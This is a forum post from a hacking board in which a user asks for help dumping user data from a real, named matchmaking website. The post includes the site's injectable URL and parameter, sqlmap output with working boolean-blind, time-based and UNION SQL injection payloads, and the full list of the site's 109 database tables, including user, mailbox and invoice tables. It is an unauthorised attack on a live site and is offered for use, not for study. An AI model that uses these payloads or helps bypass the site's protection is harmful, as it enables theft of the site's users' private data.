• XSS.stack #1 – первый литературный журнал от юзеров форума

help with getting the user data [SQLi]

nexxxt

HDD-drive
Пользователь
Регистрация
26.05.2020
Сообщения
36
Реакции
38
The tables with _ at the beginning i can't open. I'm assuming it is because of Cloudflare protection. Any ideas? I already tried several tampers as well as tor.

Код:
       https://www.muslimlife.eu/searchmatch.php?action=startSearch&txtlookageend=18&txtlookagestart=18&txtlookfrom= (GET)
   


sqlmap resumed the following injection point(s) from stored session:
---
Parameter: txtlookfrom (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: action=startSearch&txtlookageend=18&txtlookagestart=18&txtlookfrom=' AND 5081=(SELECT (CASE WHEN (5081=5081) THEN 5081 ELSE (SELECT 8146 UNION SELECT 6174) END))-- -

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=startSearch&txtlookageend=18&txtlookagestart=18&txtlookfrom=' AND (SELECT 3007 FROM (SELECT(SLEEP(10)))EvYj) AND 'yfiQ'='yfiQ

    Type: UNION query
    Title: Generic UNION query (NULL) - 58 columns
    Payload: action=startSearch&txtlookageend=18&txtlookagestart=18&txtlookfrom=' UNION ALL SELECT 71,71,CONCAT(0x7162717071,0x6c644e6e6643464e4c46664251664f49735270617a6c5555696f5667585a7547714f777948786f66,0x7162707871),71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71,71-- -
---
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
available databases [2]:
[*] information_schema
[*] muslimlife

Database: muslimlife
[109 tables]
+--------------------------------+
| _abuse                         |
| _admin                         |
| _admin_permissions             |
| _adminemails                   |
| _aff_referals                  |
| _affiliates                    |
| _alerts                        |
| _articles                      |
| _articles_desc                 |
| _banners                       |
| _buddy_ban_list                |
| _campaign                      |
| _campaign_desc                 |
| _campaign_location             |
| _campaign_prices               |
| _campaign_runtime              |
| _campaign_runtime_desc         |
| _campaign_to_group             |
| _campaign_to_location_todelete |
| _campaign_to_runtime_todelete  |
| _campaign_to_user              |
| _chatmessages                  |
| _cronjobs                      |
| _currency_conversion           |
| _featured_profiles             |
| _glblsettings                  |
| _imported_questions            |
| _imported_users                |
| _instant_message               |
| _invoices                      |
| _languages                     |
| _languages_desc                |
| _languages_tmp                 |
| _languages_tmp_desc            |
| _letters                       |
| _log                           |
| _mailbox                       |
| _matches_sent                  |
| _membership                    |
| _news                          |
| _news_desc                     |
| _newsletter                    |
| _newsletter_desc               |
| _newsletter_filter             |
| _onlineusers                   |
| _orders                        |
| _orders_feedback               |
| _orders_history                |
| _orders_subscription           |
| _pages                         |
| _pages_desc                    |
| _payment_config                |
| _payment_modules               |
| _picture_access                |
| _pollips                       |
| _polloptions                   |
| _polloptions_desc              |
| _polls                         |
| _polls_desc                    |
| _questionoptions               |
| _questionoptions_desc          |
| _questions                     |
| _questions_desc                |
| _ratings                       |
| _searchpreference              |
| _sections                      |
| _sections_desc                 |
| _states                        |
| _stories                       |
| _stories_desc                  |
| _user                          |
| _user_group_changes            |
| _user_group_log                |
| _user_history                  |
| _useralbums                    |
| _userpreference                |
| _userrating                    |
| _usersearches                  |
| _usersnaps                     |
| _usertemplates                 |
| _video_access                  |
| _views_winks                   |
| admin1Codes                    |
| admin1CodesAscii               |
| alternatename                  |
| cancel                         |
| chat                           |
| cometchat                      |
| cometchat_announcements        |
| cometchat_chatroommessages     |
| cometchat_chatrooms            |
| cometchat_chatrooms_users      |
| cometchat_status               |
| cometchat_videochatsessions    |
| continentCodes                 |
| countryInfo                    |
| featureCodes                   |
| geoname                        |
| gutschein                      |
| gutschein_code                 |
| invites                        |
| iso_languagecodes              |
| log_gutscheine                 |
| log_login                      |
| selection                      |
| support                        |
| timeZones                      |
| user_videos                    |
| zips                           |
+--------------------------------+
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх